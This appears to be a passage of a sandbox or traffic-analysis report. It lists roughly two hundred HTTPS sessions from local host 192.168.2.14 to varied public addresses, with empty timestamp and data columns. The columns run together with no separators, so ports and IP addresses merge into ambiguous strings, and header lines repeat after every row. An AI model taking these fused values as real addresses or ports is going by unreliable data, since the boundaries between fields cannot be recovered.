                                                      18756192.168.2.146086462.149.16.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18757192.168.2.1435942109.134.170.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18758192.168.2.1433240116.182.154.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18759192.168.2.1457672216.199.121.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18760192.168.2.144167464.231.24.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18761192.168.2.144433893.219.144.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18762192.168.2.144239241.43.239.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18763192.168.2.1447044165.55.34.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18764192.168.2.1449494205.44.223.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18765192.168.2.1433466164.163.126.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18766192.168.2.1457710115.152.8.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18767192.168.2.1458404196.63.184.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18768192.168.2.1438948154.163.2.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18769192.168.2.145476499.17.172.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18770192.168.2.1441892147.208.63.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18771192.168.2.1459976148.183.175.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18772192.168.2.1437836121.166.229.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18773192.168.2.144711645.125.250.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18774192.168.2.145753027.138.93.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18775192.168.2.1448478147.76.88.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18776192.168.2.145911088.79.119.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18777192.168.2.1445756121.136.175.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18778192.168.2.144472061.136.63.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18779192.168.2.144328275.232.174.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18780192.168.2.145246489.29.209.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18781192.168.2.1439168116.154.4.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18782192.168.2.144977637.86.251.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18783192.168.2.1448634185.217.136.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18784192.168.2.1445416101.250.106.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18785192.168.2.1442038172.215.162.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18786192.168.2.1452036189.180.156.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18787192.168.2.14573305.152.17.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18788192.168.2.1460732195.66.126.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18789192.168.2.1455114199.147.84.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18790192.168.2.145129887.118.40.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18791192.168.2.145550872.19.153.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18792192.168.2.145418092.241.210.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18793192.168.2.1445850119.176.161.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18794192.168.2.1450114128.63.60.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18795192.168.2.145254854.153.11.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18796192.168.2.145831619.26.223.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18797192.168.2.1460430176.144.238.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18798192.168.2.1448930104.249.213.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18799192.168.2.1445652142.52.248.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18800192.168.2.146054839.135.86.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18801192.168.2.1435340134.100.206.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18802192.168.2.143393062.26.42.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18803192.168.2.1458690153.188.206.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18804192.168.2.143694051.64.49.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18805192.168.2.1459290181.188.154.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18806192.168.2.1455408217.232.107.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18807192.168.2.1436192210.143.122.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18808192.168.2.145079036.61.79.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18809192.168.2.1448608195.122.129.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18810192.168.2.1453804168.114.73.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18811192.168.2.1439948167.209.207.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18812192.168.2.144467864.5.111.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18813192.168.2.1450608209.118.183.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18814192.168.2.145529641.12.183.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18815192.168.2.1435074137.127.216.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18816192.168.2.145101419.221.183.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18817192.168.2.1453012189.83.32.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18818192.168.2.143983677.226.112.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18819192.168.2.145948624.19.32.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18820192.168.2.1439830188.124.49.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18821192.168.2.1439058195.112.186.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18822192.168.2.1437556154.135.72.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18823192.168.2.1440492188.114.192.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18824192.168.2.1451224102.196.1.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18825192.168.2.1434400203.139.158.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18826192.168.2.1456462115.88.47.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18827192.168.2.1451386202.1.136.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18828192.168.2.144310619.222.21.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18829192.168.2.1456660186.233.59.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18830192.168.2.1459788202.204.188.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18831192.168.2.1443614208.212.243.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18832192.168.2.1456370168.45.228.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18833192.168.2.144980012.19.72.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18834192.168.2.145028818.82.57.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18835192.168.2.14368602.255.20.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18836192.168.2.1458990197.86.79.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18837192.168.2.1453442193.74.104.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18838192.168.2.1433316210.216.232.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18839192.168.2.1448844200.121.206.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18840192.168.2.143898661.239.63.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18841192.168.2.1439914184.176.244.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18842192.168.2.143670298.115.2.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18843192.168.2.1433532218.163.142.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18844192.168.2.145401069.162.15.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18845192.168.2.145336876.48.21.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18846192.168.2.1434012105.96.82.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18847192.168.2.1434070218.30.107.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18848192.168.2.1448016130.62.96.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18849192.168.2.1454616129.114.16.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18850192.168.2.145178473.199.47.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18851192.168.2.144642454.188.247.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18852192.168.2.1434254102.100.51.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18853192.168.2.144430875.222.118.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18854192.168.2.1435080118.243.13.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18855192.168.2.145144480.68.232.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18856192.168.2.1458418209.21.189.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18857192.168.2.143367481.23.152.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18858192.168.2.143813273.9.102.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18859192.168.2.1441794165.97.100.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18860192.168.2.1450334145.72.122.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18861192.168.2.1447448165.203.247.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18862192.168.2.1459880204.90.181.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18863192.168.2.1432976220.104.105.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18864192.168.2.145173434.192.7.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18865192.168.2.1441046142.143.20.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18866192.168.2.145050419.200.224.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18867192.168.2.143479268.231.147.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18868192.168.2.1454288184.192.54.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18869192.168.2.1433386219.62.208.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18870192.168.2.1439036176.107.111.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18871192.168.2.1454928174.92.170.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18872192.168.2.1432838189.127.119.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18873192.168.2.1433808144.146.212.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18874192.168.2.1434526209.147.90.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18875192.168.2.143403053.131.0.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18876192.168.2.144846477.204.69.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18877192.168.2.1438720114.171.121.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18878192.168.2.1441676107.30.23.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18879192.168.2.1433394115.33.124.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18880192.168.2.1456962110.119.128.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18881192.168.2.146067884.10.173.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18882192.168.2.1441698158.3.25.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18883192.168.2.1434434209.74.71.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18884192.168.2.143635481.11.150.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18885192.168.2.1441596125.56.238.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18886192.168.2.1434518184.46.255.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18887192.168.2.1442996208.183.93.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18888192.168.2.1459522139.206.166.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18889192.168.2.1445128162.244.237.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18890192.168.2.1439256177.7.102.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18891192.168.2.1460644109.121.15.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18892192.168.2.1442038119.40.237.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18893192.168.2.1451098186.158.126.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18894192.168.2.1441502129.181.157.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18895192.168.2.144074079.171.72.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18896192.168.2.1447150181.238.65.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18897192.168.2.1448976152.82.67.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18898192.168.2.1442482219.21.186.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18899192.168.2.1442434194.64.52.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18900192.168.2.1432852139.22.147.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18901192.168.2.143771636.212.64.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18902192.168.2.145924667.142.84.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18903192.168.2.144826459.0.72.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18904192.168.2.1459746161.118.160.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18905192.168.2.1437646135.200.65.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18906192.168.2.1454110157.190.202.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18907192.168.2.145147614.14.113.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18908192.168.2.1437798105.7.24.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18909192.168.2.1457276133.47.247.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18910192.168.2.1432858166.164.46.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18911192.168.2.14495669.157.149.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18912192.168.2.1450732169.15.117.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18913192.168.2.1454884172.221.231.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18914192.168.2.1453094137.60.251.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18915192.168.2.1454166155.175.184.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18916192.168.2.1451932131.88.250.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18917192.168.2.143961895.115.68.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18918192.168.2.1442930177.255.214.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18919192.168.2.1437014216.62.115.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18920192.168.2.1441252114.185.187.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18921192.168.2.1445462131.118.222.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18922192.168.2.1451658186.47.2.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18923192.168.2.1452774186.197.207.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18924192.168.2.145780246.5.55.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18925192.168.2.1438452118.132.213.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18926192.168.2.145361214.182.215.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18927192.168.2.1456088157.141.62.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18928192.168.2.143311490.243.153.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18929192.168.2.144970020.253.122.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18930192.168.2.145264225.130.92.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18931192.168.2.143947472.59.101.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18932192.168.2.144855470.31.5.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18933192.168.2.145021464.76.243.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18934192.168.2.1445414132.95.194.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18935192.168.2.1459568171.207.129.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18936192.168.2.1460362205.182.210.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18937192.168.2.145008272.14.151.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18938192.168.2.1459106126.12.138.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18939192.168.2.145374634.186.27.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18940192.168.2.1437804198.226.214.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18941192.168.2.1435642148.55.216.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18942192.168.2.145247635.222.24.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18943192.168.2.1456516128.174.108.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18944192.168.2.146061660.234.49.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18945192.168.2.1457676114.18.181.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18946192.168.2.143285495.21.124.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18947192.168.2.1449568193.93.234.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18948192.168.2.144595247.170.111.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18949192.168.2.143873280.158.44.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18950192.168.2.144363096.189.34.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18951192.168.2.144367050.153.227.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18952192.168.2.1454564157.247.28.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18953192.168.2.1449340178.143.4.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18954192.168.2.1457382196.61.18.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18955192.168.2.1455480217.116.81.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18956192.168.2.144621817.71.166.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18957192.168.2.145913220.153.53.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18958192.168.2.143685845.253.102.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18959192.168.2.1459272220.238.142.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18960192.168.2.1445922208.156.136.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18961192.168.2.1452004207.150.126.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18962192.168.2.144235267.74.116.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18963192.168.2.144330873.59.182.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18964192.168.2.1439328174.198.110.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18965192.168.2.1449834203.3.120.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18966192.168.2.1458214109.36.27.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18967192.168.2.146046412.90.120.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18968192.168.2.1448300106.14.103.137443
